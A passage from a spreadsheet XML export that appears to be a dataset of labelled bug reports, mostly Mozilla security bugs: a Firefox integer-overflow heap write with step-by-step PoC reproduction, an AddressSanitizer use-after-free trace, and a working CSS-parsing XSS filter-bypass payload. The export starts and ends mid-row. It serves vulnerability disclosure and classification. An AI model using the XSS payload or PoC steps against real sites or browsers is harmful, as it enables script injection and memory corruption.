Ateeq Khan - CCURE IT (ateek.khan@gmail.com) - (Communication: admin@vulnerability-lab.com)
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.vulnerability-lab.com/register
Contact:    admin@vulnerability-lab.com 	- support@vulnerability-lab.com 	       - research@vulnerability-lab.com
Section:    video.vulnerability-lab.com 	- forum.vulnerability-lab.com 		       - news.vulnerability-lab.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team &amp; the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.
    				   	Copyright © 2013 | Vulnerability Laboratory</t>
        </is>
      </c>
      <c r="X3595" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3596">
      <c r="A3596" t="n">
        <v>1823172</v>
      </c>
      <c r="B3596" t="inlineStr">
        <is>
          <t>2023-03-18 11:53:04 -0700</t>
        </is>
      </c>
      <c r="C3596" t="inlineStr">
        <is>
          <t>Write beyond bounds in TransactionObserver::OnDataAvailable()</t>
        </is>
      </c>
      <c r="D3596" t="inlineStr">
        <is>
          <t>2024-05-30 11:07:09 -0700</t>
        </is>
      </c>
      <c r="E3596" t="n">
        <v>1</v>
      </c>
      <c r="F3596" t="n">
        <v>1</v>
      </c>
      <c r="G3596" t="n">
        <v>3</v>
      </c>
      <c r="H3596" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3596" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3596" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K3596" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3596" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3596" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3596" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3596" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3596" t="inlineStr">
        <is>
          <t>[necko-triaged][necko-priority-queue] [adv-main118+]</t>
        </is>
      </c>
      <c r="Q3596" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3596" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S3596" t="inlineStr">
        <is>
          <t>118 Branch</t>
        </is>
      </c>
      <c r="T3596" t="n">
        <v>1</v>
      </c>
      <c r="U3596" t="n">
        <v>0</v>
      </c>
      <c r="V3596" t="n">
        <v>11</v>
      </c>
      <c r="W3596" t="inlineStr">
        <is>
          <t>Created attachment 9323764
ffbug_2106.htm
`TransactionObserver::OnDataAvailable()` (`netwerk/protocol/http/AlternateServices.cpp`) can experience an integer overflow and subsequent underallocation and write beyond bounds (WBB) under specific conditions. The data written beyond bounds is unmodified attacker-provided data, and it is written into the heap of the chrome process.
The bug is in line 824, which adds two `uint32_t`s without checking for overflow:
```
   818: NS_IMETHODIMP
   819: TransactionObserver::OnDataAvailable(nsIRequest* aRequest,
   820:                                      nsIInputStream* aStream, uint64_t aOffset,
   821:                                      uint32_t aCount) {
   822:   MOZ_ASSERT(NS_IsMainThread());
   823:   uint32_t oldLen = mWKResponse.Length();
   824:   uint64_t newLen = aCount + oldLen;
   825:   if (newLen &lt; MAX_WK) {
   826:     auto handleOrErr = mWKResponse.BulkWrite(newLen, oldLen, false);
   827:     if (handleOrErr.isErr()) {
   828:       return handleOrErr.unwrapErr();
   829:     }
   830:     auto handle = handleOrErr.unwrap();
   831:     uint32_t amtRead;
   832:     if (NS_SUCCEEDED(
   833:             aStream-&gt;Read(handle.Elements() + oldLen, aCount, &amp;amtRead))) {
   834:       MOZ_ASSERT(oldLen + amtRead &lt;= newLen);
   835:       handle.Finish(oldLen + amtRead, false);
   836:       LOG(("TransactionObserver onDataAvailable %p read %d of .wk [%zd]\n",
   837:            this, amtRead, mWKResponse.Length()));
   838:     } else {
   839:       LOG(("TransactionObserver onDataAvailable %p read error\n", this));
   840:     }
   841:   }
   842:   return NS_OK;
   843: }
```
The conditions required are (1) some nonstandard prefs; and (2) a main thread that stalls at the right time and long enough for the socket thread to accumulate enough data to trigger the overflow. These conditions are unlikely to occur in the wild, though probably there are other combinations of prefs that would elicit the same behavior, and there probably still are ways to monopolize the chrome process's main thread for long periods of time.
Attached is a POC that shows the overflow and WBB. Use the POC thusly:
1. Copy `ffbug_2106.htm` to a webserver.
2. Compile and run `gen-attack.cpp` and copy the resulting file to `/.well_known/http-opportunistic` on the same webserver as in step 1. This file can contain any attacker-provided data, but must be large enough to cause the overflow.
3. Configure the webserver to serve HTTP content on port `444` (as well as the default port `80`) and to send the header
```
   Alt-Svc: h2=":444"
```
4. Start FF and set prefs as follows:
```
   network.http.altsvc.oe     true
   network.buffer.cache.size  510       // yes, really 510 and not 512
   network.buffer.cache.count 8421510   // not critical, just has to be large enough
```
5. Attach a debugger to FF and set a BP on line 824, above.
6. Load `ffbug_2106.htm` in FF.
7. When the BP fires, freeze the thread (should be main thread in the chrome process) to simulate a lengthy operation on the main thread. Continue execution.
8. FF will accumulate &gt; 4GB of memory usage. When it stops adding memory, use the debugger to break into execution.
9. Thaw the thread that you froze in step 7. Proceed.
10. When you get a second BP, aCount probably will be &gt;= `0x10000`, which would make the remainder of the function a no-op. Just proceed.
11. After a few seconds you'll get a third BP, this time with `aCount` == `0xfffffefe`. Now step lines 823-24 and notice that `oldLen` probably == `0x200`, and that `aCount + oldLen` on line 824 overflowed, causing `newLen` to have the value `0xfe`.
12. Step through lines 822-23 and watch them write beyond bounds. Proceed and the program probably eventually will hit a no-access page and crash.</t>
        </is>
      </c>
      <c r="X3596" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3597">
      <c r="A3597" t="n">
        <v>192513</v>
      </c>
      <c r="B3597" t="inlineStr">
        <is>
          <t>2003-02-09 17:15:13 -0800</t>
        </is>
      </c>
      <c r="C3597" t="inlineStr">
        <is>
          <t>processmail as a package cleanup</t>
        </is>
      </c>
      <c r="D3597" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:35 -0800</t>
        </is>
      </c>
      <c r="E3597" t="n">
        <v>1</v>
      </c>
      <c r="F3597" t="n">
        <v>1</v>
      </c>
      <c r="G3597" t="n">
        <v>4</v>
      </c>
      <c r="H3597" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3597" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3597" t="inlineStr">
        <is>
          <t>Administration</t>
        </is>
      </c>
      <c r="K3597" t="inlineStr">
        <is>
          <t>2.17.3</t>
        </is>
      </c>
      <c r="L3597" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3597" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3597" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3597" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3597" t="inlineStr"/>
      <c r="Q3597" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3597" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3597" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T3597" t="n">
        <v>1</v>
      </c>
      <c r="U3597" t="n">
        <v>0</v>
      </c>
      <c r="V3597" t="n">
        <v>13</v>
      </c>
      <c r="W3597" t="inlineStr">
        <is>
          <t>move.pl and importxml.pl both call processmail, which no longer exists.  They
need to be changed to use Bugzilla::BugMail.</t>
        </is>
      </c>
      <c r="X3597" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3598">
      <c r="A3598" t="n">
        <v>893308</v>
      </c>
      <c r="B3598" t="inlineStr">
        <is>
          <t>2013-07-12 19:19:55 -0700</t>
        </is>
      </c>
      <c r="C3598" t="inlineStr">
        <is>
          <t>Heap-use-after-free in nsAnimationManager::BuildAnimations</t>
        </is>
      </c>
      <c r="D3598" t="inlineStr">
        <is>
          <t>2024-05-30 08:05:29 -0700</t>
        </is>
      </c>
      <c r="E3598" t="n">
        <v>1</v>
      </c>
      <c r="F3598" t="n">
        <v>1</v>
      </c>
      <c r="G3598" t="n">
        <v>3</v>
      </c>
      <c r="H3598" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3598" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3598" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K3598" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3598" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3598" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3598" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3598" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3598" t="inlineStr">
        <is>
          <t>[asan][adv-main24+][adv-esr1709+]</t>
        </is>
      </c>
      <c r="Q3598" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3598" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3598" t="inlineStr">
        <is>
          <t>mozilla26</t>
        </is>
      </c>
      <c r="T3598" t="n">
        <v>1</v>
      </c>
      <c r="U3598" t="n">
        <v>0</v>
      </c>
      <c r="V3598" t="n">
        <v>49</v>
      </c>
      <c r="W3598" t="inlineStr">
        <is>
          <t>Created attachment 775067
Testcase
Need to install fuzzPriv extension [https://www.squarefree.com/extensions/domFuzzLite3.xpi]. Usually reproduces in one try, but do try with reload if it does not.
==1210==ERROR: AddressSanitizer: heap-use-after-free on address 0x61900d449420 at pc 0x7f183c1696ee bp 0x7fff6f500cd0 sp 0x7fff6f500cc8
READ of size 8 at 0x61900d449420 thread T0
    #0 0x7f183c1696ed in nsTArray_base&lt;nsTArrayInfallibleAllocator, nsTArray_CopyElements&lt;nsISupports*&gt; &gt;::Length() const ../../../../dist/include/nsTArray.h:371
    #1 0x7f183c1695d1 in nsCOMArray_base::Count() const ../../../../dist/include/nsCOMArray.h:95
    #2 0x7f18448ee188 in mozilla::css::GroupRule::StyleRuleCount() const ../../dist/include/mozilla/css/GroupRule.h:54
    #3 0x7f18448e8895 in nsAnimationManager::BuildAnimations(nsStyleContext*, nsTArray&lt;ElementAnimation&gt;&amp;) layout/style/nsAnimationManager.cpp:783
    #4 0x7f18448e4f78 in nsAnimationManager::CheckAnimationRule(nsStyleContext*, mozilla::dom::Element*) layout/style/nsAnimationManager.cpp:568
    #5 0x7f1844e8b9ba in nsStyleSet::GetContext(nsStyleContext*, nsRuleNode*, nsRuleNode*, nsIAtom*, nsCSSPseudoElements::Type, mozilla::dom::Element*, unsigned int) layout/style/nsStyleSet.cpp:833
    #6 0x7f1844e9496a in nsStyleSet::ResolveStyleFor(mozilla::dom::Element*, nsStyleContext*, TreeMatchContext&amp;) layout/style/nsStyleSet.cpp:1205
    #7 0x7f1843daf486 in nsFrameManager::ReResolveStyleContext(nsPresContext*, nsIFrame*, nsIContent*, nsStyleChangeList*, nsChangeHint, nsChangeHint, nsRestyleHint, mozilla::css::RestyleTracker&amp;, nsFrameManager::DesiredA11yNotifications, nsTArray&lt;nsIContent*&gt;&amp;, TreeMatchContext&amp;) layout/base/nsFrameManager.cpp:1256
    #8 0x7f1843db79d9 in nsFrameManager::ComputeStyleChangeFor(nsIFrame*, nsStyleChangeList*, nsChangeHint, mozilla::css::RestyleTracker&amp;, bool) layout/base/nsFrameManager.cpp:1695
    #9 0x7f1843a81991 in nsCSSFrameConstructor::RestyleElement(mozilla::dom::Element*, nsIFrame*, nsChangeHint, mozilla::css::RestyleTracker&amp;, bool) layout/base/nsCSSFrameConstructor.cpp:8340
    #10 0x7f18439d12d2 in mozilla::css::RestyleTracker::ProcessOneRestyle(mozilla::dom::Element*, nsRestyleHint, nsChangeHint) layout/base/RestyleTracker.cpp:122
    #11 0x7f18439ccf11 in mozilla::css::RestyleTracker::DoProcessRestyles() layout/base/RestyleTracker.cpp:209
    #12 0x7f1843aa6a06 in mozilla::css::RestyleTracker::ProcessRestyles() layout/base/RestyleTracker.h:217
    #13 0x7f1843aa6397 in nsCSSFrameConstructor::ProcessPendingRestyles() layout/base/nsCSSFrameConstructor.cpp:12071
    #14 0x7f1843f384cc in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) layout/base/nsPresShell.cpp:3858
    #15 0x7f1843f37087 in PresShell::FlushPendingNotifications(mozFlushType) layout/base/nsPresShell.cpp:3743
    #16 0x7f1845a8456e in nsDocument::FlushPendingNotifications(mozFlushType) content/base/src/nsDocument.cpp:7085
    #17 0x7f184b9d1391 in nsDocLoader::DocLoaderIsEmpty(bool) uriloader/base/nsDocLoader.cpp:709
    #18 0x7f184b9d5b2b in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) uriloader/base/nsDocLoader.cpp:639
    #19 0x7f184b9d71ea in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) uriloader/base/nsDocLoader.cpp:643
    #20 0x7f1841e32480 in nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, tag_nsresult) netwerk/base/src/nsLoadGroup.cpp:684
    #21 0x7f1845a98575 in nsDocument::DoUnblockOnload() content/base/src/nsDocument.cpp:7965
    #22 0x7f1845a97fcb in nsDocument::UnblockOnload(bool) content/base/src/nsDocument.cpp:7893
    #23 0x7f1845a3b713 in nsDocument::DispatchContentLoadedEvents() content/base/src/nsDocument.cpp:4680
    #24 0x7f1845b52b1a in nsRunnableMethodImpl&lt;void (nsDocument::*)(), true&gt;::Run() ../../../dist/include/nsThreadUtils.h:350
    #25 0x7f18416e2feb in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:621
    #26 0x7f18412fdd22 in NS_ProcessNextEvent(nsIThread*, bool) objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:238
    #27 0x7f183cffea89 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:81
    #28 0x7f1841aa3bfb in MessageLoop::RunInternal() ipc/chromium/src/base/message_loop.cc:219
    #29 0x7f1841aa3a4e in MessageLoop::RunHandler() ipc/chromium/src/base/message_loop.cc:212
    #30 0x7f1841aa3939 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:186
    #31 0x7f184d36ce1e in nsBaseAppShell::Run() widget/xpwidgets/nsBaseAppShell.cpp:163
    #32 0x7f184bf10ae0 in nsAppStartup::Run() toolkit/components/startup/nsAppStartup.cpp:269
    #33 0x7f183c115aeb in XREMain::XRE_mainRun() toolkit/xre/nsAppRunner.cpp:3853
    #34 0x7f183c11a89d in XREMain::XRE_main(int, char**, nsXREAppData const*) toolkit/xre/nsAppRunner.cpp:3921
    #35 0x7f183c11d4d5 in XRE_main toolkit/xre/nsAppRunner.cpp:4123
    #36 0x42a0d7 in do_main(int, char**, nsIFile*) browser/app/nsBrowserApp.cpp:272
    #37 0x4270e1 in main browser/app/nsBrowserApp.cpp:632
    #38 0x7f18602ad76c in
    #39 0x426854 in _start
0x61900d449420 is located 32 bytes inside of 72-byte region [0x61900d449400,0x61900d449448)
freed by thread T0 here:
    #0 0x41a5f2 in __interceptor_free
    #1 0x7f185e2096de in moz_free memory/mozalloc/mozalloc.cpp:48
    #2 0x7f1844aec3b9 in operator delete(void*) ../../dist/include/mozilla/mozalloc.h:225
    #3 0x7f1844aec3b9 in nsCSSKeyframesRule::~nsCSSKeyframesRule() layout/style/nsCSSRules.cpp:2454
    #4 0x7f1844ab7122 in mozilla::css::GroupRule::DeleteCycleCollectable() layout/style/nsCSSRules.cpp:568
    #5 0x7f1844b14928 in mozilla::css::GroupRule::cycleCollection::DeleteCycleCollectableImpl(void*) ../../dist/include/mozilla/css/GroupRule.h:39
    #6 0x7f18417aad7f in SnowWhiteKiller::~SnowWhiteKiller() xpcom/base/nsCycleCollector.cpp:2173
    #7 0x7f184176837e in SnowWhiteKiller::~SnowWhiteKiller() xpcom/base/nsCycleCollector.cpp:2168
    #8 0x7f184175c525 in nsCycleCollector::FreeSnowWhite(bool) xpcom/base/nsCycleCollector.cpp:2280
    #9 0x7f184175a984 in nsCycleCollectorRunner::Collect(ccType, nsCycleCollectorResults*, nsICycleCollectorListener*) xpcom/base/nsCycleCollector.cpp:1171
    #10 0x7f1841773500 in nsCycleCollector::Collect(ccType, nsCycleCollectorResults*, nsICycleCollectorListener*) xpcom/base/nsCycleCollector.cpp:2883
    #11 0x7f184177a715 in nsCycleCollector_collect(bool, nsCycleCollectorResults*, nsICycleCollectorListener*) xpcom/base/nsCycleCollector.cpp:3312
    #12 0x7f1848a0fae2 in nsJSContext::CycleCollectNow(nsICycleCollectorListener*, int, bool) dom/base/nsJSEnvironment.cpp:2566
    #13 0x7f184873af46 in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*, int) dom/base/nsDOMWindowUtils.cpp:1203
    #14 0x7f1841838bbb in NS_InvokeByIndex xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162
    #15 0x7f184b4caa70 in CallMethodHelper::Invoke() js/xpconnect/src/XPCWrappedNative.cpp:2795
    #16 0x7f184b4caa70 in CallMethodHelper::Call() js/xpconnect/src/XPCWrappedNative.cpp:2133
    #17 0x7f184b4caa70 in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) js/xpconnect/src/XPCWrappedNative.cpp:2099
    #18 0x7f184b5231df in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1315
    #19 0x7f1854cc4acc in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) js/src/jscntxtinlines.h:225
    #20 0x7f1854cc4acc in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/vm/Interpreter.cpp:478
    #21 0x7f1854ca3c90 in Interpret(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:2503
    #22 0x7f1854c525d6 in js::RunScript(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:435
    #23 0x7f1854cc5157 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/vm/Interpreter.cpp:497
    #24 0x7f1854cc9013 in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::MutableHandle&lt;JS::Value&gt;) js/src/vm/Interpreter.cpp:528
    #25 0x7f1855e25d13 in js::DirectProxyHandler::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) js/src/jsproxy.cpp:451
    #26 0x7f185617e722 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) js/src/jswrapper.cpp:446
    #27 0x7f1855e9400e in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) js/src/jsproxy.cpp:2633
    #28 0x7f1855eb16ca in proxy_Call(JSContext*, unsigned int, JS::Value*) js/src/jsproxy.cpp:3205
    #29 0x7f1854cc43dc in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) js/src/jscntxtinlines.h:225
    #30 0x7f1854cc43dc in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/vm/Interpreter.cpp:471
    #31 0x7f1854ca3c90 in Interpret(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:2503
    #32 0x7f1854c525d6 in js::RunScript(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:435
    #33 0x7f1854cc5157 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/vm/Interpreter.cpp:497
    #34 0x7f1854cc9013 in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::MutableHandle&lt;JS::Value&gt;) js/src/vm/Interpreter.cpp:528
previously allocated by thread T0 here:
    #0 0x41a6d2 in malloc
    #1 0x7f185e209825 in moz_xmalloc memory/mozalloc/mozalloc.cpp:54
    #2 0x7f18449ee3f3 in operator new(unsigned long) ../../dist/include/mozilla/mozalloc.h:201
    #3 0x7f18449ee3f3 in (anonymous namespace)::CSSParserImpl::ParseKeyframesRule(void (*)(mozilla::css::Rule*, void*), void*) layout/style/nsCSSParser.cpp:2624
    #4 0x7f18449e59ef in (anonymous namespace)::CSSParserImpl::ParseAtRule(void (*)(mozilla::css::Rule*, void*), void*, bool) layout/style/nsCSSParser.cpp:1673
    #5 0x7f184492dd6e in (anonymous namespace)::CSSParserImpl::ParseSheet(nsAString_internal const&amp;, nsIURI*, nsIURI*, nsIPrincipal*, unsigned int, bool) layout/style/nsCSSParser.cpp:988
    #6 0x7f184492cdcf in nsCSSParser::ParseSheet(nsAString_internal const&amp;, nsIURI*, nsIURI*, nsIPrincipal*, unsigned int, bool) layout/style/nsCSSParser.cpp:10870
    #7 0x7f184485ef6c in mozilla::css::Loader::ParseSheet(nsAString_internal const&amp;, mozilla::css::SheetLoadData*, bool&amp;) layout/style/Loader.cpp:1628
    #8 0x7f184485cc97 in mozilla::css::SheetLoadData::OnStreamComplete(nsIUnicharStreamLoader*, nsISupports*, tag_nsresult, nsAString_internal const&amp;) layout/style/Loader.cpp:938
    #9 0x7f184485f8fb in non-virtual thunk to mozilla::css::SheetLoadData::OnStreamComplete(nsIUnicharStreamLoader*, nsISupports*, tag_nsresult, nsAString_internal const&amp;) layout/style/Loader.cpp:941
    #10 0x7f184203714e in nsUnicharStreamLoader::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) netwerk/base/src/nsUnicharStreamLoader.cpp:99
    #11 0x7f1841d57c17 in nsBaseChannel::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) netwerk/base/src/nsBaseChannel.cpp:737
    #12 0x7f1841d5810a in non-virtual thunk to nsBaseChannel::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) netwerk/base/src/nsBaseChannel.cpp:752
    #13 0x7f1841e1e61c in nsInputStreamPump::OnStateStop() netwerk/base/src/nsInputStreamPump.cpp:623
    #14 0x7f1841e1ae7c in nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) netwerk/base/src/nsInputStreamPump.cpp:395
    #15 0x7f1841e1eaa2 in non-virtual thunk to nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) netwerk/base/src/nsInputStreamPump.cpp:439
    #16 0x7f18415bfcdc in nsInputStreamReadyEvent::Run() xpcom/io/nsStreamUtils.cpp:82
    #17 0x7f18416e2feb in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:621
    #18 0x7f18412fdd22 in NS_ProcessNextEvent(nsIThread*, bool) objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:238
    #19 0x7f183cffea89 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:81
    #20 0x7f1841aa3bfb in MessageLoop::RunInternal() ipc/chromium/src/base/message_loop.cc:219
    #21 0x7f1841aa3a4e in MessageLoop::RunHandler() ipc/chromium/src/base/message_loop.cc:212
    #22 0x7f1841aa3939 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:186
    #23 0x7f184d36ce1e in nsBaseAppShell::Run() widget/xpwidgets/nsBaseAppShell.cpp:163
    #24 0x7f184bf10ae0 in nsAppStartup::Run() toolkit/components/startup/nsAppStartup.cpp:269
    #25 0x7f183c115aeb in XREMain::XRE_mainRun() toolkit/xre/nsAppRunner.cpp:3853
    #26 0x7f183c11a89d in XREMain::XRE_main(int, char**, nsXREAppData const*) toolkit/xre/nsAppRunner.cpp:3921
    #27 0x7f183c11d4d5 in XRE_main toolkit/xre/nsAppRunner.cpp:4123
    #28 0x42a0d7 in do_main(int, char**, nsIFile*) browser/app/nsBrowserApp.cpp:272
    #29 0x4270e1 in main browser/app/nsBrowserApp.cpp:632
    #30 0x7f18602ad76c in
Shadow bytes around the buggy address:
  0x0c3281a81230: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3281a81240: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3281a81250: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3281a81260: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3281a81270: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=&gt;0x0c3281a81280: fd fd fd fd[fd]fd fd fd fd fa fa fa fa fa fa fa
  0x0c3281a81290: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3281a812a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3281a812b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3281a812c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3281a812d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:     fa
  Heap righ redzone:     fb
  Freed Heap region:     fd
  Stack left redzone:    f1
  Stack mid redzone:     f2
  Stack right redzone:   f3
  Stack partial redzone: f4
  Stack after return:    f5
  Stack use after scope: f8
  Global redzone:        f9
  Global init order:     f6
  Poisoned by user:      f7
  ASan internal:         fe
==1210==ABORTING</t>
        </is>
      </c>
      <c r="X3598" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3599">
      <c r="A3599" t="n">
        <v>1555523</v>
      </c>
      <c r="B3599" t="inlineStr">
        <is>
          <t>2019-05-29 15:36:38 -0700</t>
        </is>
      </c>
      <c r="C3599" t="inlineStr">
        <is>
          <t>Incorrect parsing of style tag leads to XSS if HTML+CSS is allowed but no JS</t>
        </is>
      </c>
      <c r="D3599" t="inlineStr">
        <is>
          <t>2024-05-30 09:59:46 -0700</t>
        </is>
      </c>
      <c r="E3599" t="n">
        <v>1</v>
      </c>
      <c r="F3599" t="n">
        <v>1</v>
      </c>
      <c r="G3599" t="n">
        <v>3</v>
      </c>
      <c r="H3599" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3599" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3599" t="inlineStr">
        <is>
          <t>DOM: HTML Parser</t>
        </is>
      </c>
      <c r="K3599" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3599" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3599" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3599" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3599" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3599" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main68+][adv-esr60.8+]</t>
        </is>
      </c>
      <c r="Q3599" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3599" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3599" t="inlineStr">
        <is>
          <t>mozilla69</t>
        </is>
      </c>
      <c r="T3599" t="n">
        <v>1</v>
      </c>
      <c r="U3599" t="n">
        <v>0</v>
      </c>
      <c r="V3599" t="n">
        <v>26</v>
      </c>
      <c r="W3599" t="inlineStr">
        <is>
          <t>I was pentesting a web-site with a Javascript-filter. It wanted to allow HTML+CSS but no Javascript. During the assessment I found a CSS-parser bug in Firefox, where the parsing is different from other tested web browsers (Chrome/Safari) in how you terminate CSS.
This trick allowed me to bypass their protection and I think it is likely it will work in other places as well.
This was tested on the latest stable/regular version on OSX.
PoC: https://playground.zulln.se/poc/firefoxcss.html
Source code:
&lt;style&gt;&lt;/style&lt;/style&gt;&lt;img src="&lt;/style&gt;&lt;svg/onload=alert(document.domain)&gt;"&gt;</t>
        </is>
      </c>
      <c r="X3599" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3600">
      <c r="A3600" t="n">
        <v>896268</v>
      </c>
      <c r="B3600" t="inlineStr">
        <is>
          <t>2013-07-21 10:05:49 -0700</t>
        </is>
      </c>
      <c r="C3600" t="inlineStr">
        <is>
